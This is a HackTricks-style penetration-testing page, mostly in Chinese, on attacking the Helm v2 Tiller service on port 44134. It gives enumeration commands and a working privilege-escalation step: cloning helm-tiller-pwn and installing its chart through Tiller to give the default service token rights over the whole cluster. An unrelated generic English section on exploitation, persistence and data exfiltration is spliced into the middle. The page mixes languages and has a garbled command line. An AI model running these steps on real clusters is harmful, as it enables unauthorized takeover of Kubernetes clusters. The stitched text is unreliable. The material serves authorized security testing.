hacktricks/network-services-pentesting/44134-pentesting-tiller-helm.md

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一个网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品The PEASS Family

• 获得官方PEASS和HackTricks周边产品

• 加入 💬 Discord群组 或 telegram群组 或 关注我在Twitter上的🐦@carlospolopm.

• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。

基本信息

Helm是Kubernetes的包管理器。它允许将YAML文件打包并分发到公共和私有仓库中。这些包被称为Helm Charts。Tiller是默认运行在端口44134上的服务。

默认端口： 44134

PORT      STATE SERVICE VERSION
44134/tcp open  unknown

枚举

如果你可以枚举不同命名空间的Pod和/或服务，请枚举它们并搜索名称中带有**"tiller"**的实例：

kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"

Examples:

Reconnaissance

Enumerate Tiller Service

To start the reconnaissance phase, we need to identify if the Tiller service is running on the target system. We can use the following command to check if the Tiller service is listening on the default port 44134:

nmap -p 44134 <target_ip>

If the Tiller service is running, we will see an open port 44134 in the scan results.

Enumerate Tiller Releases

Once we have confirmed that the Tiller service is running, we can enumerate the available releases using the following command:

helm list

This command will display a list of all the releases managed by Tiller, along with their status, version, and other relevant information.

Exploitation

Exploit Tiller Service

If we have identified a vulnerable version of Tiller, we can exploit it to gain unauthorized access to the target system. One common vulnerability is the lack of authentication and authorization in older versions of Tiller.

To exploit this vulnerability, we can use the following command to establish a connection to the Tiller service:

helm init --client-only

This command will initialize the Helm client and establish a connection to the Tiller service. Once connected, we can use other Helm commands to interact with the target system.

Exploit Tiller Releases

If we have identified a vulnerable release managed by Tiller, we can exploit it to gain unauthorized access to the target system. This can be done by leveraging known vulnerabilities in the specific release or misconfigurations in the deployment.

To exploit a vulnerable release, we need to first identify the specific version and any associated vulnerabilities. Once we have this information, we can use various techniques such as exploiting known vulnerabilities, privilege escalation, or lateral movement to gain unauthorized access.

Post-Exploitation

Maintain Access

After gaining unauthorized access to the target system, it is important to maintain access for future exploitation or data exfiltration. This can be achieved by creating a backdoor or establishing persistence mechanisms.

To maintain access, we can use techniques such as creating a new user account, modifying existing user accounts, or installing a remote access tool. These techniques will allow us to regain access to the target system even if our initial access is discovered and removed.

Data Exfiltration

Once we have gained unauthorized access to the target system, we may want to exfiltrate sensitive data for further analysis or exploitation. This can be done by copying files, extracting databases, or using network protocols to transfer data to an external server.

To exfiltrate data, we need to identify the location of the sensitive data and the appropriate method for extraction. It is important to be cautious and minimize the impact on the target system to avoid detection.

Conclusion

In this chapter, we have explored various techniques for pentesting Tiller and Helm. By performing reconnaissance, exploiting vulnerabilities, and maintaining access, we can gain unauthorized access to the target system and exfiltrate sensitive data. It is important to always follow ethical guidelines and obtain proper authorization before conducting any pentesting activities.

kubectl get pods -n kube-system
NAME                                       READY   STATUS             RESTARTS   AGE
kube-scheduler-controlplane                1/1     Running            0          35m
tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m

kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m

您还可以尝试通过检查端口44134来查找该服务是否正在运行：

sudo nmap -sS -p 44134 <IP>

一旦你发现了它，你可以通过下载客户端helm应用程序与之通信。你可以使用像homebrew这样的工具，或者查看官方发布页面**。**有关更多详细信息或其他选项，请参阅安装指南。

然后，你可以枚举服务：

helm --host tiller-deploy.kube-system:44134 version

提权

默认情况下，Helm2以高权限安装在kube-system命名空间中，因此如果您找到该服务并且可以访问它，这将允许您提升权限。

您只需要安装一个类似于这个的软件包：https://github.com/Ruil1n/helm-tiller-pwn，它将使默认服务令牌可以访问整个集群中的所有内容。

git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart

在http://rui0.cn/archives/1573中，你可以找到攻击的解释，但基本上，如果你阅读_helm-tiller-pwn/pwnchart/templates/_目录下的clusterrole.yaml和clusterrolebinding.yaml文件，你会看到所有权限都被授予了默认令牌。

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？想要在HackTricks中宣传你的公司吗？或者你想要获取最新版本的PEASS或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品——The PEASS Family

• 获得官方PEASS和HackTricks周边产品

• 加入💬 Discord群组或电报群组，或者关注我在Twitter上的🐦@carlospolopm。

• 通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧。